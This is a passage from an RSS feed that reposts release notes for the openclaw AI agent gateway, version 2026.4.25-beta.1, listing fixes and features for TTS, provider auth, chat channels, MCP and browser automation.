<li>Agents/replies: recover final-answer text when streamed assistant chunks contain only whitespace, preventing completed turns from surfacing as empty-payload errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327458962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71454/hovercard" href="https://github.com/openclaw/openclaw/issues/71454">#71454</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327500044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71467" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71467/hovercard" href="https://github.com/openclaw/openclaw/pull/71467">#71467</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Feishu/TTS: transcode voice-intent MP3 and other audio replies to Ogg/Opus before sending native Feishu audio bubbles, while keeping ordinary MP3 attachments as files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206957369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61249" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61249/hovercard" href="https://github.com/openclaw/openclaw/issues/61249">#61249</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034320677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37868/hovercard" href="https://github.com/openclaw/openclaw/issues/37868">#37868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ycjlb2023-peteryi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ycjlb2023-peteryi">@ycjlb2023-peteryi</a>.</li>
<li>WhatsApp/TTS: transcode MP3/WebM audio, including Microsoft Edge TTS output, to Ogg/Opus before sending PTT voice notes.</li>
<li>QQBot/TTS: honor plain <code>audioAsVoice</code> replies by synthesizing TTS to native QQ voice messages, and mark inbound voice-only messages as audio media without exposing raw voice paths to generic media context.</li>
<li>Providers/SenseAudio: add bundled SenseAudio batch audio transcription through <code>tools.media.audio</code> with <code>SENSEAUDIO_API_KEY</code> auth. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265936553" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66943/hovercard" href="https://github.com/openclaw/openclaw/pull/66943">#66943</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fl0rencess720/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fl0rencess720">@Fl0rencess720</a>.</li>
<li>Providers/MiniMax: let TTS use MiniMax portal OAuth and Token Plan credentials before falling back to <code>MINIMAX_API_KEY</code>, and include current TTS HD model ids. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141517456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55017/hovercard" href="https://github.com/openclaw/openclaw/issues/55017">#55017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zx15210404690-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zx15210404690-hash">@zx15210404690-hash</a>.</li>
<li>Telegram/webhook: acknowledge validated webhook updates before running bot middleware, keeping slow agent turns from tripping Telegram delivery retries while preserving per-chat processing lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326997239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71392/hovercard" href="https://github.com/openclaw/openclaw/issues/71392">#71392</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelforsberg46-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelforsberg46-source">@joelforsberg46-source</a>.</li>
<li>MCP/config reload: hot-apply <code>mcp.*</code> changes by disposing cached session MCP runtimes, and dispose bundled MCP runtimes during gateway shutdown so removed <code>mcp.servers</code> entries reap child processes promptly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203179674" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60656/hovercard" href="https://github.com/openclaw/openclaw/issues/60656">#60656</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xieyuanqing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xieyuanqing">@xieyuanqing</a>.</li>
<li>Active Memory: keep silent recall sub-agent billing/auth failures out of shared auth-profile cooldown state, so a Claude CLI extra-usage rejection cannot disable normal Claude-backed turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325943036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71284/hovercard" href="https://github.com/openclaw/openclaw/issues/71284">#71284</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327867252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71539" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71539/hovercard" href="https://github.com/openclaw/openclaw/pull/71539">#71539</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Auth/Claude CLI: sync refreshed Claude CLI OAuth credentials into the managed auth profile so long-running Claude CLI runs stop falling back to stale OpenClaw snapshots. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320240541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70902" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70902/hovercard" href="https://github.com/openclaw/openclaw/pull/70902">#70902</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/starvex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/starvex">@starvex</a>.</li>
<li>Sessions: make <code>sessions_spawn(mode="session")</code> errors name usable alternatives when the current channel cannot bind subagent threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271801625" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67400/hovercard" href="https://github.com/openclaw/openclaw/issues/67400">#67400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277983433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67790" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67790/hovercard" href="https://github.com/openclaw/openclaw/pull/67790">#67790</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stainlu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stainlu">@stainlu</a>.</li>
<li>Agents/Claude CLI: pass the OpenClaw system prompt through Claude's prompt-file flag so Windows runs avoid argv length failures without changing system prompt semantics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292748556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69158" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69158/hovercard" href="https://github.com/openclaw/openclaw/issues/69158">#69158</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293340040" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69211" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69211/hovercard" href="https://github.com/openclaw/openclaw/pull/69211">#69211</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skylee-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skylee-01">@skylee-01</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassioanorte/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassioanorte">@cassioanorte</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Syu0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Syu0">@Syu0</a>, and @Stache73.</li>
<li>Agents/CLI sessions: bind <code>google-gemini-cli</code> session auth-epoch to the Google account identity in <code>~/.gemini/oauth_creds.json</code>, so Gemini-backed agents resume their conversation after gateway restart instead of minting a fresh session, and stale bindings are invalidated when the authenticated Google account changes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321086277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70973/hovercard" href="https://github.com/openclaw/openclaw/issues/70973">#70973</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322606915" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71076" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71076/hovercard" href="https://github.com/openclaw/openclaw/pull/71076">#71076</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Slack: stop treating user mentions in assistant-authored message edit blocks as sender attribution, preventing edited bot messages from spoofing a mentioned DM user. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328906494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71700" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71700/hovercard" href="https://github.com/openclaw/openclaw/pull/71700">#71700</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex: consume unauthorized bound conversation inbound claims before they can fall through to other claim handlers or enqueue Codex turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71702" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71702/hovercard" href="https://github.com/openclaw/openclaw/pull/71702">#71702</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex media understanding: require approval-checked app-server image turns while explicitly declining tool, file, permission, and elicitation approval requests for the bounded image worker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71703/hovercard" href="https://github.com/openclaw/openclaw/pull/71703">#71703</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Claude CLI: allow large live <code>stream-json</code> JSONL lines up to the existing per-turn raw limit, preventing large Telegram, WebChat, MCP, and image turns from aborting on the old stdout buffer cap. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329383401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71793/hovercard" href="https://github.com/openclaw/openclaw/issues/71793">#71793</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322675128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71080/hovercard" href="https://github.com/openclaw/openclaw/issues/71080">#71080</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318647707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70766/hovercard" href="https://github.com/openclaw/openclaw/issues/70766">#70766</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329830196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71897" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71897/hovercard" href="https://github.com/openclaw/openclaw/pull/71897">#71897</a>) Thanks @chacher86, @shivamgrover21, and @tpjordan.</li>
<li>Agents/Claude CLI: unwrap nested Claude result envelopes in CLI JSON output so delegated agent responses surface as final text instead of raw result JSON. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264813860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66819/hovercard" href="https://github.com/openclaw/openclaw/pull/66819">#66819</a>) Thanks @mraleko.</li>
<li>Agents/Claude CLI: apply the configured 1M context window override to eligible Claude CLI Opus and Sonnet models when <code>context1m</code> is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319842892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70863/hovercard" href="https://github.com/openclaw/openclaw/pull/70863">#70863</a>) Thanks @bidadh.</li>
<li>Models/status: report fresh Claude CLI native auth instead of stale stored <code>anthropic:claude-cli</code> profile expiry when local credentials are current. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325517974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71256" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71256/hovercard" href="https://github.com/openclaw/openclaw/issues/71256">#71256</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326550173" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71332/hovercard" href="https://github.com/openclaw/openclaw/pull/71332">#71332</a>) Thanks @matthiasjanke and @neeravmakwana.</li>
<li>CLI backends: compact OpenClaw transcripts after over-budget CLI turns and reseed fresh CLI sessions from the compacted transcript instead of stale external resume state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285899710" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68329/hovercard" href="https://github.com/openclaw/openclaw/issues/68329">#68329</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329888680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71916" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71916/hovercard" href="https://github.com/openclaw/openclaw/pull/71916">#71916</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Telegram: keep default tool progress messages visible when answer preview streaming is disabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329509796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71825" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71825/hovercard" href="https://github.com/openclaw/openclaw/pull/71825">#71825</a>) Thanks @VACInc.</li>
<li>Configure/models: clear deselected model fallbacks when updating the model picker allowlist, including provider-scoped setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328198274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71596" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71596/hovercard" href="https://github.com/openclaw/openclaw/pull/71596">#71596</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Agents/streaming: strip namespaced <code>&lt;antml:thinking&gt;</code> reasoning tags from streamed assistant replies before user-visible text is emitted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294779031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69288/hovercard" href="https://github.com/openclaw/openclaw/pull/69288">#69288</a>) Thanks @xialonglee.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.25-beta.1]]></title>
<description><![CDATA[2026.4.25
Highlights

Voice replies get a full TTS upgrade: /tts latest, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, ...]]></description>
<link>https://tsecurity.de/de/3465670/downloads/openclaw-2026425-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3465670/downloads/openclaw-2026425-beta1/</guid>
<pubDate>Sun, 26 Apr 2026 13:45:41 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.25</h2>
<h3>Highlights</h3>
<ul>
<li>Voice replies get a full TTS upgrade: <code>/tts latest</code>, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discovery, and install metadata more deterministic. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>OpenTelemetry coverage expands across model calls, token usage, tool loops, harness runs, exec processes, outbound delivery, context assembly, and memory pressure with bounded low-cardinality attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Browser automation gets safer tab URLs, iframe-aware role snapshots, CDP readiness tuning, headless one-shot launch, and deeper browser doctor probes for slow hosts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Control UI and setup flows add PWA/Web Push support, Crestodian first-run repair, TUI setup, context mode selection, and a shorter startup greeting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Install/update hardening covers Windows, macOS, Linux, Docker, bundled plugin runtime deps, Node service restarts, LaunchAgent token rotation, and mixed-version gateway verification. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>TTS/WhatsApp: add <code>/tts latest</code> read-aloud support with duplicate suppression and <code>/tts chat on|off|default</code> session-scoped auto-TTS overrides, completing the on-demand voice-note UX for current-chat replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256179902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66032/hovercard" href="https://github.com/openclaw/openclaw/issues/66032">#66032</a>.</li>
<li>TTS/channels: resolve channel and account TTS overrides generically, enabling Feishu and QQBot accounts to deep-merge <code>channels.&lt;channel&gt;.accounts.&lt;id&gt;.tts</code> over global and per-agent TTS config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>TTS/agents: allow <code>agents.list[].tts</code> to override global <code>messages.tts</code> for per-agent voices, and make <code>/tts audio</code>, <code>/tts status</code>, and the <code>tts</code> agent tool honor the active voice/provider override while keeping shared provider credentials and preferences in the existing TTS config surface.</li>
<li>Providers/Azure Speech: add Azure Speech as a bundled TTS provider with Speech-resource auth, voice listing, SSML escaping, native Ogg/Opus voice-note output, and telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113089889" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51776" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51776/hovercard" href="https://github.com/openclaw/openclaw/pull/51776">#51776</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>.</li>
<li>Google Meet: add calendar-backed attendance export workflows, export manifests, dry-run previews, and tool parity for meeting records.</li>
<li>Control UI: add PWA install support and Web Push notifications for Gateway chat. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068543152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44590/hovercard" href="https://github.com/openclaw/openclaw/pull/44590">#44590</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>.</li>
<li>Browser automation: add safe tab URLs in agent responses plus a CDP-native role snapshot fallback with iframe-aware refs, cursor-clickable detection, target attach preparation, and <code>openclaw browser doctor --deep</code> live snapshot probing.</li>
<li>CLI/image generation: expose generic <code>--background</code> on <code>openclaw infer image generate</code> and <code>openclaw infer image edit</code>, keep <code>--openai-background</code> as an OpenAI alias, and let fal image generation honor <code>--output-format png|jpeg</code>.</li>
<li>Browser/config: allow local managed Chrome launch discovery and post-launch CDP readiness timeouts to be raised for slower hosts such as Raspberry Pi. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264662087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66803/hovercard" href="https://github.com/openclaw/openclaw/issues/66803">#66803</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a>.</li>
<li>Discord: allow <code>channels.discord.voice.model</code> to override the LLM used for voice channel responses while keeping STT and TTS on their existing media settings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240023484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64368" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64368/hovercard" href="https://github.com/openclaw/openclaw/pull/64368">#64368</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrdavey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrdavey">@mrdavey</a>.</li>
<li>Browser/CLI: add <code>openclaw browser start --headless</code> as a one-shot local managed browser launch override without rewriting persisted browser config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
